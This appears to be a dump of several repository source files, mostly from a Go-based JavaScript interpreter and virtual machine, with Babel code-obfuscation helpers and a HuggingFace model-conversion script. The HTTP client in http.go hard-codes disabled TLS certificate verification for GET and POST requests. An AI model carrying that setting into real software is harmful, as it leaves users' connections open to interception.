PAXU: token.ONE,
}
} else {
return &token.TokenType{
TypeInfo: token.IDENT,
Value: card,
PAXU: token.ONE,
}
}
}
}
}
func (lp *LexerParse) Input() []*token.TokenType {
dataList := []*token.TokenType{}
for {
card := lp.nextCard()
if (*card).TypeInfo == token.END {
return dataList
}
dataList = append(dataList, card)
}
}
|
2833844911/gojsvmp | 2,325 | promise/promise.go | package promise
import (
"myvmp/ast"
"myvmp/object"
"myvmp/token"
"sync"
)
var AllInfo sync.WaitGroup
var paseData *func(dtt *ast.Statement, env *object.Environment) object.Object
func Promise_thenT(myfun *object.FunctionDeclarationObject) object.Object {
//fmt.Println(myfun.Args[0], "thenjjjjjjjjjjjjjjjjj")
dbb := myfun.Args
fuenv := myfun.Env
for idx, vkey := range myfun.Params {
zzkey := (*vkey).(*ast.Identifier).Name
//if (zzkey == "rerea"){
// fmt.Println()
//}
if idx >= len(dbb) {
fuenv.Store.Set(zzkey, &object.NULLObject{})
continue
}
fuenv.Store.Set(zzkey, *dbb[idx])
}
AllInfo.Add(1)
go func() {
defer AllInfo.Done()
(*paseData)(&myfun.Body, myfun.Env)
}()
return &object.NULLObject{}
}
func Promise_then(myfun *object.FunctionDeclarationObject) object.Object {
promise_thenT := Promise_thenT
fundd := (*myfun.Args[0]).(*object.FunctionDeclarationObject)
newEnv := NewEnv(myfun.Env, fundd.Params)
myfun.Env.Store.Set(token.Cbb_a, &object.FunctionDeclarationObject{Params: fundd.Params, IsNative: 1, NativeBody: &promise_thenT, Env: newEnv, Body: fundd.Body})
if len(myfun.Args) >= 2 {
fundd2 := (*myfun.Args[1]).(*object.FunctionDeclarationObject)
myfun.Env.Store.Set(token.Cbb_b, &object.FunctionDeclarationObject{Params: fundd2.Params, IsNative: 1, NativeBody: &promise_thenT, Env: newEnv, Body: fundd2.Body})
}
//dtold := myfun.Args[1]
return newEnv
}
func NewEnv(eg *object.Environment, ddp []*ast.Statement) *object.Environment {
s := object.NewSafeMap()
promise_then := Promise_then
env := &object.Environment{Store: s, Outer: eg, TypeInfo: token.ENV}
s.Set(token.Promise_then, &object.FunctionDeclarationObject{Params: ddp, IsNative: 1, NativeBody: &promise_then, Env: env})
s.Set(token.Cbb_a, &object.NULLObject{})
s.Set(token.Cbb_b, &object.NULLObject{})
return env
}
func Init(dofun *func(dtt *ast.Statement, env *object.Environment) object.Object, funcdt *object.Object, env *object.Environment) object.Object {
fundd := (*funcdt).(*object.FunctionDeclarationObject)
newEnv := NewEnv(env, fundd.Params)
paseData = dofun
fundd.Env = newEnv
AllInfo.Add(1)
go func() {
defer AllInfo.Done()
(*dofun)(&fundd.Body, newEnv)
}()
return newEnv
}
func CyJSInit() {
AllInfo = sync.WaitGroup{}
}
func Done() {
AllInfo.Wait()
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 3,428 | src/transformers/models/flava/convert_dalle_to_flava_codebook.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import torch
from transformers import FlavaImageCodebook, FlavaImageCodebookConfig
def rreplace(s, old, new, occurrence):
li = s.rsplit(old, occurrence)
return new.join(li)
def count_parameters(state_dict):
# encoder.embeddings are double copied in original FLAVA
return sum(param.float().sum() if "encoder.embeddings" not in key else 0 for key, param in state_dict.items())
def upgrade_state_dict(state_dict):
upgrade = {}
group_keys = ["group_1", "group_2", "group_3", "group_4"]
for key, value in state_dict.items():
for group_key in group_keys:
if group_key in key:
key = key.replace(f"{group_key}.", f"{group_key}.group.")
if "res_path" in key:
key = key.replace("res_path.", "res_path.path.")
if key.endswith(".w"):
key = rreplace(key, ".w", ".weight", 1)
if key.endswith(".b"):
key = rreplace(key, ".b", ".bias", 1)
upgrade[key] = value.float()
return upgrade
@torch.no_grad()
def convert_dalle_checkpoint(checkpoint_path, pytorch_dump_folder_path, config_path=None, save_checkpoint=True):
"""
Copy/paste/tweak model's weights to transformers design.
"""
from dall_e import Encoder
encoder = Encoder()
if os.path.exists(checkpoint_path):
ckpt = torch.load(checkpoint_path)
else:
ckpt = torch.hub.load_state_dict_from_url(checkpoint_path)
if isinstance(ckpt, Encoder):
ckpt = ckpt.state_dict()
encoder.load_state_dict(ckpt)
if config_path is not None:
config = FlavaImageCodebookConfig.from_pretrained(config_path)
else:
config = FlavaImageCodebookConfig()
hf_model = FlavaImageCodebook(config).eval()
state_dict = encoder.state_dict()
hf_state_dict = upgrade_state_dict(state_dict)
hf_model.load_state_dict(hf_state_dict)
hf_state_dict = hf_model.state_dict()
hf_count = count_parameters(hf_state_dict)
state_dict_count = count_parameters(state_dict)
assert torch.allclose(hf_count, state_dict_count, atol=1e-3)
if save_checkpoint:
hf_model.save_pretrained(pytorch_dump_folder_path)
else:
return hf_state_dict
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--pytorch_dump_folder_path", default=None, type=str, help="Path to the output PyTorch model.")
parser.add_argument("--checkpoint_path", default=None, type=str, help="Path to flava checkpoint")
parser.add_argument("--config_path", default=None, type=str, help="Path to hf config.json of model to convert")
args = parser.parse_args()
convert_dalle_checkpoint(args.checkpoint_path, args.pytorch_dump_folder_path, args.config_path)
|
2833844911/gojsvmp | 1,517 | re/re.go | package re
import (
"fmt"
"myvmp/object"
"regexp"
)
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object, typeS string, Obj any) object.Object {
d := &object.FunctionDeclarationObject{IsNative: 1, NativeBody: ddd, BindType: typeS, BindOb: Obj}
return d
}
func Re_findall(myfun *object.FunctionDeclarationObject) object.Object {
myfunStr := (*myfun.Args[0]).(*object.StringObject).Value
myStr := (*myfun.Args[1]).(*object.StringObject).Value
re, err := regexp.Compile(myfunStr)
if err != nil {
fmt.Println("Error compiling regex:", err)
return nil
}
// 查找所有匹配项
matches := re.FindAllStringSubmatch(myStr, -1)
dtList := object.NewArray()
for _, match := range matches {
if len(match) > 1 { // match[0] 是整个匹配,match[1] 是第一个括号表达式的匹配
kk := &object.StringObject{Value: match[1]}
var nnn object.Object = kk
dtList.Value = append(dtList.Value, &nnn)
} else {
kk := &object.StringObject{Value: match[0]}
var nnn object.Object = kk
dtList.Value = append(dtList.Value, &nnn)
}
}
return &dtList
}
func Re_sub(myfun *object.FunctionDeclarationObject) object.Object {
myfunStr := (*myfun.Args[0]).(*object.StringObject).Value
myStr := (*myfun.Args[1]).(*object.StringObject).Value
myStr2 := (*myfun.Args[2]).(*object.StringObject).Value
re, err := regexp.Compile(myfunStr)
if err != nil {
fmt.Println("Error compiling regex:", err)
return nil
}
// 查找所有匹配项
matches := re.ReplaceAllString(myStr, myStr2)
return &object.StringObject{Value: matches}
}
|
2833844911/gojsvmp | 4,470 | parsejson/parsejson.go | package parsejson
import (
"encoding/json"
"fmt"
"myvmp/object"
"myvmp/token"
)
func printJSON(data interface{}, envobject *object.Environment) *object.Environment {
switch v := data.(type) {
case map[string]interface{}:
dataeenv := newObject()
for key, value := range v {
switch value.(type) {
case string:
dataeenv.Store.Set(key, &object.StringObject{
Value: value.(string),
})
case int:
dataeenv.Store.Set(key, &object.NumericObject{
Value: float64(value.(int)),
})
case float64:
dataeenv.Store.Set(key, &object.NumericObject{
Value: value.(float64),
})
case bool:
dataeenv.Store.Set(key, &object.BoolObject{
Value: value.(bool),
})
default:
dataeenv.Store.Set(key, printJSON(value, envobject))
}
}
return dataeenv
case []interface{}:
dataeenv := newArray()
for _, value := range v {
switch value.(type) {
case string:
var dasda object.Object = &object.StringObject{
Value: value.(string),
}
dataeenv.Value = append(dataeenv.Value, &dasda)
case int:
var dasda object.Object = &object.NumericObject{
Value: float64(value.(int)),
}
dataeenv.Value = append(dataeenv.Value, &dasda)
case float64:
var dasda object.Object = &object.NumericObject{
Value: value.(float64),
}
dataeenv.Value = append(dataeenv.Value, &dasda)
case bool:
var dasda object.Object = &object.BoolObject{
Value: value.(bool),
}
dataeenv.Value = append(dataeenv.Value, &dasda)
default:
var dasda object.Object = printJSON(value, envobject)
dataeenv.Value = append(dataeenv.Value, &dasda)
}
}
return dataeenv
default:
fmt.Printf("%v\n", v)
}
return nil
}
func newObject() *object.Environment {
dataeenv := object.NewObject()
return &dataeenv
}
func newArray() *object.Environment {
dataeenv := object.NewArray()
return &dataeenv
}
func ParseStrToJson(jsonStr string) object.Object {
var data map[string]interface{}
var ListDt []interface{}
var dsad object.Object
if err := json.Unmarshal([]byte(jsonStr), &data); err != nil {
if errw := json.Unmarshal([]byte(jsonStr), &ListDt); errw != nil {
fmt.Println("Error parsing JSON:", errw)
return nil
} else {
dsad = printJSON(ListDt, nil)
}
} else {
dsad = printJSON(data, nil)
}
return dsad
}
func stringifyTostr2(objec3 []*object.Object) []interface{} {
dt := []interface{}{}
for _, valuee := range objec3 {
value := (*valuee)
switch value.Type() {
case token.TYNUM:
dsd := value.(*object.NumericObject).Value
dt = append(dt, dsd)
case token.TYSTR:
dsd := value.(*object.StringObject).Value
dt = append(dt, dsd)
case token.Object:
dsd := value.(*object.Environment).Store.M
dt = append(dt, stringifyTostr(dsd))
case token.BOOL:
dsd := value.(*object.BoolObject).Value
dt = append(dt, dsd)
case token.ArrayE:
dsd := value.(*object.Environment).Value
dt = append(dt, stringifyTostr2(dsd))
default:
dt = append(dt, token.YOUZ+value.Type()+token.ZUOZ)
}
}
return dt
}
func stringifyTostr(objec3 map[string]object.Object) map[string]interface{} {
dt := map[string]interface{}{}
for key, value := range objec3 {
switch value.Type() {
case token.TYNUM:
dsd := value.(*object.NumericObject).Value
dt[key] = dsd
case token.TYSTR:
dsd := value.(*object.StringObject).Value
dt[key] = dsd
case token.Object:
dsd := value.(*object.Environment).Store.M
dt[key] = stringifyTostr(dsd)
case token.BOOL:
dsd := value.(*object.BoolObject).Value
dt[key] = dsd
case token.ArrayE:
dsd := value.(*object.Environment).Value
dt[key] = stringifyTostr2(dsd)
default:
continue
}
}
return dt
}
func JsonToStr(objec3 *object.Environment) object.Object {
switch objec3.Type() {
case token.ArrayE:
dsd := objec3.Value
dgg := stringifyTostr2(dsd)
jsonString, err := json.Marshal(dgg)
if err != nil {
//fmt.Println("Error marshaling to JSON:", err)
return &object.StringObject{Value: "[]"}
}
return &object.StringObject{Value: string(jsonString)}
case token.Object:
dsad := objec3.Store.M
dgg := stringifyTostr(dsad)
jsonString, err := json.Marshal(dgg)
if err != nil {
//fmt.Println("Error marshaling to JSON:", err)
return &object.StringObject{Value: "{}"}
}
return &object.StringObject{Value: string(jsonString)}
}
return &object.StringObject{Value: token.YOUZ + token.THIS + token.ZUOZ}
}
|
2833844911/gojsvmp | 4,212 | token/token.go | package token
type TokenType struct {
TypeInfo string
Value string
PAXU int
}
const (
TYNUM = "number"
TYSTR = "string"
BULLE = "null"
NANINFO = "NaN"
BOOL = "boolean"
FUNCTION = "function"
TRUE = "true"
FALSE = "false"
)
const (
NNNN = ""
ELSE = "else"
TYPEOF = "typeof"
FUN = "function"
FOR = "for"
DENYU = "="
QUFAN = "!"
BUDY = "!="
BUDYDY = "!=="
Str = "\""
Str2 = "'"
XIAND = "=="
MAOHAO = ":"
QUYU = "%"
HUO = "|"
HUOHUO = "||"
YU = "&"
YUYU = "&&"
XIAOYH = "<"
XIAOYHYH = "<<"
JIADEN = "+="
JANDEN = "-="
XIAOYHYHYH = "<<<"
XIAOYHDY = "<="
DAYH = ">"
DAYHDY = ">="
DAYHYH = ">>"
DAYHYHYU = ">>>"
DXIAND = "==="
IF = "if"
ZHUOK = "("
YOUOK = ")"
YOUZ = "["
ZUOZ = "]"
ADD = "+"
YIHUO = "^"
DH = ","
SDD = "-"
CHU = "/"
ZUOKH = "}"
DUOZF = "`"
YOUKH = "{"
CHEN = "*"
KAIFAN = "**"
UPADD = "++"
UPASD = "--"
DONT = "DONT"
END = ""
Kong = ""
Dian = "."
)
const (
ZNO = 0
ONE = -1
TWO = 2
SCRRR = 3
FOTT = 4
FIVE = 5
SIX = 6
)
const (
Slice = "slice"
Length = "length"
)
const (
GetLength = "len"
ParseInt = "parseInt"
Wait = "wait"
ParseFloat = "parseFloat"
Print = "cyout"
GetChar = "cychar"
CharToStr = "cystr"
Input = "input"
AppendArray = "cyappend"
Delete = "delete"
)
const (
Math = "Math"
Math_random = "random"
Math_Pow = "pow"
Math_Sqrt = "sqrt"
)
const (
Objecte = "Object"
Objecte_setPrototypeOf = "setPrototypeOf"
Objecte_keys = "keys"
)
const (
Promise = "Promise"
Promise_then = "then"
Cbb_a = "cbb_a"
Cbb_b = "cbb_b"
)
const (
JSON = "JSON"
JSON_stringify = "stringify"
JSON_parse = "parse"
)
const (
Date = "Date"
Date_now = "now"
Date_sleep = "sleep"
)
const (
CONSOLE = "console"
CONSOLE_log = "log"
)
const (
String = "String"
String_fromCharCode = "fromCharCode"
String_strip = "strip"
String_replace = "replace"
String_split = "split"
String_decode = "decode"
String_encode = "encode"
String_newbyte = "newbyte"
)
const (
Etree = "etree"
Etree_HTML = "HTML"
Etree_xpath = "xpath"
Etree_gethtml = "gethtml"
)
const (
Fs = "fs"
File = "file"
Fs_open = "open"
Fs_read = "read"
Fs_readCont = "readcont"
Fs_close = "close"
Fs_write = "write"
Fs_cmd = "cmd"
Fs_ms = "ms"
Fs_encoding = "encoding"
)
const (
Re = "re"
Re_findall = "findall"
Re_sub = "sub"
)
const (
PUSH = "push"
POP = "pop"
JION = "join"
)
const (
Cyhttp = "cyhttp"
Cyhttp_get = "get"
Cyhttp_post = "post"
Cyhttp_ReHeaders = "headers"
Headers = "headers"
Timeout = "timeout"
Params = "params"
Allow_redirects = "allow_redirects"
Proxies = "proxies"
Content = "content"
Status = "status"
Iserror = "iserror"
Text = "text"
Data = "data"
Json = "json"
Jsontext = "jsontext"
Headerstext = "jsontext"
Headerstext2 = "jsontext2"
)
const (
Prog = "Prog"
IDENT = "IDENT"
NULL = "null"
BYTE = "byte"
INT = "INT"
VAR = "var"
CALL = "call"
APPLY = "apply"
Bin = "Bin"
OVER = ";"
HUANH = "\n"
TB = "\t"
TR = "\r"
Ass = "Ass"
Call = "Call"
NOP = " "
IfStat = "IfStat"
Block = "Block"
Arguments = "arguments"
Unary = "Unary"
FuncD = "FuncD"
FuncE = "FuncE"
Member = "Member"
Stri = "Stri"
THIS = "this"
ENV = "env"
IN = "in"
CONTINUE = "continue"
ForS = "ForS"
ForI = "ForI"
ArrayE = "ArrayE"
Object = "Object"
Prop = "Prop"
BREAK = "break"
TRY = "try"
CATCH = "catch"
RETURN = "return"
Debug = "debugger"
NEW = "new"
Eval = "eval"
Require = "require"
)
|
2833844911/gojsvmp | 4,249 | http/http.go | package http
import (
"bytes"
"crypto/tls"
"encoding/json"
"io/ioutil"
"net/http"
"net/url"
"time"
)
func GetHttp(urlInfo string, headers map[string]string, timeOut int64, Params map[string]string, allowRedirects bool, proxyURL string) *Response {
myresponse := New_response()
if Params != nil {
data := url.Values{}
for key, vlue := range Params {
data.Set(key, vlue)
}
urlInfo = urlInfo + "?" + data.Encode()
}
// 设置代理
var proxyFunc func(*http.Request) (*url.URL, error)
if proxyURL != "" {
proxyURLParsed, err := url.Parse(proxyURL)
if err != nil {
// Handle error if the proxy URL is invalid
return nil
}
proxyFunc = http.ProxyURL(proxyURLParsed)
} else {
proxyFunc = http.ProxyFromEnvironment
}
tlsConfig := &tls.Config{}
tlsConfig.InsecureSkipVerify = true
req, err := http.NewRequest("GET", urlInfo, nil)
if err != nil {
myresponse.ErrMessage = err.Error()
return myresponse
}
for key, value := range headers {
req.Header.Set(key, value)
}
timeOut2 := time.Duration(timeOut) * time.Second
client := &http.Client{
Timeout: timeOut2,
Transport: &http.Transport{
Proxy: proxyFunc,
TLSClientConfig: tlsConfig,
//DialTLSContext: func(ctx context.Context, network, addr string) (net.Conn, error) {
// // 建立一个原始连接
// dialer := &net.Dialer{Timeout: 10 * time.Second}
// //conn, err := dialer.DialContext(ctx, network, proxyURL.Host)
// conn, err := dialer.DialContext(ctx, network, addr)
// if err != nil {
// return nil, err
// }
//
// // 使用 uTLS 扩展原始连接
// uconn := utls.UClient(conn, &utls.Config{
// InsecureSkipVerify: true,
// }, utls.HelloChrome_120)
// // 完成握手
// if err := uconn.Handshake(); err != nil {
// return nil, err
// }
// return uconn, nil
//},
},
CheckRedirect: func(req *http.Request, via []*http.Request) error {
if !allowRedirects && len(via) >= 1 {
return http.ErrUseLastResponse
}
return nil
},
}
resp, err := client.Do(req)
if err != nil {
myresponse.ErrMessage = err.Error()
return myresponse
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
myresponse.ErrMessage = err.Error()
return myresponse
}
jsonString, _ := json.Marshal(resp.Header)
myresponse.ReHeaders = string(jsonString)
myresponse.IsError = false
myresponse.Text = string(body)
myresponse.Status = resp.Status
myresponse.Content = body
return myresponse
}
func PostHttp(urlInfo string, headers map[string]string, timeOut int64, Params map[string]string, allowRedirects bool, proxyURL string, data string) *Response {
myresponse := New_response()
if Params != nil {
data := url.Values{}
for key, vlue := range Params {
data.Set(key, vlue)
}
urlInfo = urlInfo + "?" + data.Encode()
}
// 设置代理
var proxyFunc func(*http.Request) (*url.URL, error)
if proxyURL != "" {
proxyURLParsed, err := url.Parse(proxyURL)
if err != nil {
// Handle error if the proxy URL is invalid
return nil
}
proxyFunc = http.ProxyURL(proxyURLParsed)
} else {
proxyFunc = http.ProxyFromEnvironment
}
tlsConfig := &tls.Config{}
tlsConfig.InsecureSkipVerify = true
req, err := http.NewRequest("POST", urlInfo, bytes.NewBuffer([]byte(data)))
if err != nil {
myresponse.ErrMessage = err.Error()
return myresponse
}
for key, value := range headers {
req.Header.Set(key, value)
}
timeOut2 := time.Duration(timeOut) * time.Second
client := &http.Client{
Timeout: timeOut2,
Transport: &http.Transport{
Proxy: proxyFunc,
TLSClientConfig: tlsConfig,
},
CheckRedirect: func(req *http.Request, via []*http.Request) error {
if !allowRedirects && len(via) >= 1 {
return http.ErrUseLastResponse
}
return nil
},
}
resp, err := client.Do(req)
if err != nil {
myresponse.ErrMessage = err.Error()
return myresponse
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
myresponse.ErrMessage = err.Error()
return myresponse
}
jsonString, _ := json.Marshal(resp.Header)
myresponse.ReHeaders = string(jsonString)
myresponse.IsError = false
myresponse.Text = string(body)
myresponse.Status = resp.Status
myresponse.Content = body
return myresponse
}
|
2833844911/cy_jsvmp | 1,350 | tool/cshshuzduei.js | function cshduei(){
this.pop = function (){
var t
if (!this.gx[this.s][0]){
this.gx[this.s][0] = "yhhw"+this.num
this.gx["yhhw"+this.num] = [undefined, this.s,undefined]
this.num += 1
}
return t = this.gx[this.s][2], this.s = this.gx[this.s][0], this.length -= 1, t;
}
this.push = function (a){
var hu = this.gx[this.s][1];
if (!hu){
this.gx["yhh"+this.num] = [this.s, undefined,undefined], hu = "yhh"+this.num,
this.num += 1
}
return this.s = hu, this.gx[this.s][2] = a,this.length += 1, a;
}
this.sf = function (){
var e
if (this.length < 1){return 10}
return e = this.gx[this.s][2], this.s = this.gx[this.s][0], this.length--, this.s = this.gx[this.s][1], this.gx[this.s][2] = e,this.length+=1, 101;
}
this.shift = function (){
var sc, h, g = this.s;
this.length -= 1;
this.s = this.gx[this.s][0]
h = this.gx[g][2];
while (!![]){
if (g === this.gx["cbb1"][1]){
break
}
sc = this.gx[this.gx[g][0]][2], this.gx[this.gx[g][0]][2] = h, h = sc,g = this.gx[g][0];
}
return h;
}
this.gx = CbbTHALLYhh
this.s = "cbb1"
this.length = 0
this.num = 0
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,124 | src/transformers/models/decision_transformer/__init__.py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available
_import_structure = {
"configuration_decision_transformer": [
"DECISION_TRANSFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP",
"DecisionTransformerConfig",
],
}
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_decision_transformer"] = [
"DECISION_TRANSFORMER_PRETRAINED_MODEL_ARCHIVE_LIST",
"DecisionTransformerGPT2Model",
"DecisionTransformerGPT2PreTrainedModel",
"DecisionTransformerModel",
"DecisionTransformerPreTrainedModel",
]
if TYPE_CHECKING:
from .configuration_decision_transformer import (
DECISION_TRANSFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP,
DecisionTransformerConfig,
)
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_decision_transformer import (
DECISION_TRANSFORMER_PRETRAINED_MODEL_ARCHIVE_LIST,
DecisionTransformerGPT2Model,
DecisionTransformerGPT2PreTrainedModel,
DecisionTransformerModel,
DecisionTransformerPreTrainedModel,
)
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
2833844911/cy_jsvmp | 3,512 | tool/switchtoif.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
function switchtoif(data){
let parsetoSy = {
SwitchStatement(path){
function diedaidata( shuenxun){
if (shuenxun.length == 2){
var s = shuenxun[0][1].pop()
if (s.type !== "BreakStatement"){
shuenxun[0][1].push(s)
}
s = shuenxun[1][1].pop()
if (s.type !== "BreakStatement"){
shuenxun[1][1].push(s)
}
var jiego = tee.ifStatement(tee.binaryExpression("<", tee.identifier(tiaojian), tee.numericLiteral(shuenxun[0][0] +1)),
tee.blockStatement(shuenxun[0][1]), tee.blockStatement(shuenxun[1][1]))
;
return jiego;
}else if (shuenxun.length == 1){
var s = shuenxun[0][1].pop()
if (s.type !== "BreakStatement"){
shuenxun[0][1].push(s)
}
return tee.blockStatement(shuenxun[0][1])
}
var zj = Math.ceil(shuenxun.length/2)
var jiego = tee.ifStatement(tee.binaryExpression("<", tee.identifier(tiaojian), tee.numericLiteral(shuenxun[zj][0])),
diedaidata(shuenxun.slice(0, zj)), diedaidata(shuenxun.slice(zj))
);
return jiego
}
var tiaojian = path.node.discriminant.name;
var shuenxun = [];
var shunull = null
var cz = [];
while (1){
let max = -1;
let value = null
for (let i = 0; i < path.node.cases.length; i++){
if (path.node.cases[i].test == null){
if (cz.indexOf(null) == -1 && shunull == null){
cz.push(null)
shunull =path.node.cases[i].consequent
}
continue
}
if ( path.node.cases[i].test.value > max && cz.indexOf(path.node.cases[i].test.value ) == -1){
max = path.node.cases[i].test.value
value = path.node.cases[i].consequent;
}
}
shuenxun.splice(0,0,[max,value])
cz.push(max)
if (cz.length >= path.node.cases.length){
break
}
}
log(cz)
var rety;
if (shunull == null){
rety = diedaidata(shuenxun, tiaojian)
}else{
var s = shunull.pop()
if (s.type !== "BreakStatement"){
shunull.push(s)
}
rety =
tee.ifStatement(parser.parse(`${JSON.stringify(cz)}.indexOf(${tiaojian}) == -1`).program.body[0].expression,
tee.blockStatement(shunull), diedaidata(shuenxun, tiaojian)
);
}
path.replaceInline(rety)
path.skip()
}
}
let ast = parser.parse(data)
traverse(ast, parsetoSy)
return generator(ast).code
}
exports.switchtoif = switchtoif;
|
2833844911/cy_jsvmp | 2,457 | tool/tosanyuan.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
function tosanyuan(data){
var ast = parser.parse(data)
let parseDate = {
IfStatement(path){
var shuj = []
if ( path.node.alternate == undefined || path.node.consequent == undefined){
return
}
if (path.node.alternate.body == undefined){
if (path.node.alternate.type === "ExpressionStatement"){
shuj.push(path.node.alternate.expression)
}else {
shuj.push(path.node.alternate)
}
}else {
for (let i = 0; i< path.node.alternate.body.length; i++){
if (path.node.alternate.body[i].type === "ExpressionStatement"){
shuj.push(path.node.alternate.body[i].expression)
}else {
shuj.push(path.node.alternate.body[i])
}
}
}
var shuj2 = []
if (path.node.consequent.body == undefined){
if (path.node.consequent.type === "ExpressionStatement"){
shuj2.push(path.node.consequent.expression)
}else {
shuj2.push(path.node.consequent)
}
}else{
for (let i = 0; i< path.node.consequent.body.length; i++){
if (path.node.consequent.body[i].type === "ExpressionStatement"){
shuj2.push(path.node.consequent.body[i].expression)
}else {
shuj2.push(path.node.consequent.body[i])
}
}
}
var hu,ko,kop, kop2;
try{
hu = tee.conditionalExpression(path.node.test, tee.sequenceExpression(shuj2), tee.sequenceExpression(shuj))
path.replaceInline(hu)
}catch (e){
}
}
}
traverse(ast, parseDate)
return generator(ast, {
minified: true,
comments: false,
jsescOption: {
minimal: true
}
}).code.replace('Cbb([],[]);','')
}
exports.tosanyuan = tosanyuan;
|
2833844911/gojsvmp | 20,783 | banding/banding.go | package banding
import (
"bufio"
"bytes"
"fmt"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
"io/ioutil"
"math"
"math/rand"
"myvmp/etree"
"myvmp/fs"
"myvmp/http"
"myvmp/object"
"myvmp/parsejson"
"myvmp/re"
"myvmp/token"
"os"
"strconv"
"strings"
"time"
"unicode/utf8"
)
func ParseInt(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
kk := (*dt[0]).Type()
switch kk {
case token.TYSTR:
vlue := (*dt[0]).(*object.StringObject)
num, err := strconv.Atoi(vlue.Value)
if err != nil {
return &object.NumericObject{Value: 0}
}
return &object.NumericObject{Value: float64(num)}
case token.TYNUM:
vlue := (*dt[0]).(*object.NumericObject)
return &object.NumericObject{Value: float64(int(vlue.Value))}
}
return &object.NumericObject{Value: float64(0)}
}
func ParseFloat(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
kk := (*dt[0]).Type()
switch kk {
case token.TYSTR:
vlue := (*dt[0]).(*object.StringObject)
num, err := strconv.ParseFloat(vlue.Value, 64)
if err != nil {
return &object.NumericObject{Value: 0}
}
return &object.NumericObject{Value: num}
case token.TYNUM:
vlue := (*dt[0]).(*object.NumericObject)
return &object.NumericObject{Value: vlue.Value}
}
return &object.NumericObject{Value: float64(0)}
}
func CharToStr(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
dtw := int((*dt[0]).(*object.NumericObject).Value)
//fmt.Println(dtw)
s := strconv.Itoa(dtw)
//fmt.Println(s, utf8.RuneCountInString(string(dtw)))
return &object.StringObject{Value: s}
}
func AppendArray(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
(*dt[0]).(*object.Environment).Value = append((*dt[0]).(*object.Environment).Value, dt[1])
return *dt[1]
}
//
//func GetToken(dt []*object.Object) object.Object {
// // 获取 window 对象
//
// // 获取 window 对象
// window := js.Global()
// cdzfc := (*dt[0]).(*object.StringObject).Value
// // 读取 window.mytoken 的值
// window.Call("cycallback", cdzfc)
//
// dte := &object.StringObject{Value: cdzfc}
// return dte
//}
func Delete(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
ko := (*dt[0]).(*object.Environment)
typej := ko.Type()
var out object.Object
switch typej {
case token.Object:
key := (*dt[1]).(*object.StringObject)
out, _ = ko.Store.Get(key.Value)
ko.Store.Delete(key.Value)
//delete(ko.Store, key.Value)
case token.ArrayE:
key := int((*dt[1]).(*object.NumericObject).Value)
out = *ko.Value[key]
jhhi := ko.Value[0:key]
jhhi2 := ko.Value[key+1 : len(ko.Value)]
ko.Value = append(jhhi, jhhi2...)
}
return out
}
func CyPrint(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
for idx, v := range dt {
fmt.Printf((*v).ToString())
if idx != len(dt)-1 {
fmt.Printf(" ")
}
}
fmt.Printf("\n")
return &object.NULLObject{}
}
func Input(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
for idx, v := range dt {
fmt.Printf((*v).ToString())
if idx != len(dt)-1 {
fmt.Printf(" ")
}
}
scanner := bufio.NewScanner(os.Stdin)
// 读取输入
scanner.Scan()
input := scanner.Text()
// 检查是否有错误
if err := scanner.Err(); err != nil {
fmt.Println("读取输入时发生错误:", err)
return nil
}
// 输出用户输入的字符串
return &object.StringObject{Value: input}
}
func GetChar(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
var din int
if len(dt) == 1 {
din = 0
} else {
kp := int((*dt[1]).(*object.NumericObject).Value)
din = kp
}
strInfo := (*dt[0]).(*object.StringObject).Value
runes := []rune(strInfo)
return &object.NumericObject{
Value: float64(runes[din]),
}
}
func GetLength(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args
kk := (*dt[0]).Type()
switch kk {
case token.TYSTR:
vlue := (*dt[0]).(*object.StringObject)
//fmt.Println(vlue.Value, len(vlue.Value), vlue.Value[0], vlue.Value[1])
return &object.NumericObject{Value: float64(utf8.RuneCountInString(vlue.Value))}
case token.ArrayE:
vlue := (*dt[0]).(*object.Environment).Value
return &object.NumericObject{Value: float64(len(vlue))}
case token.Object:
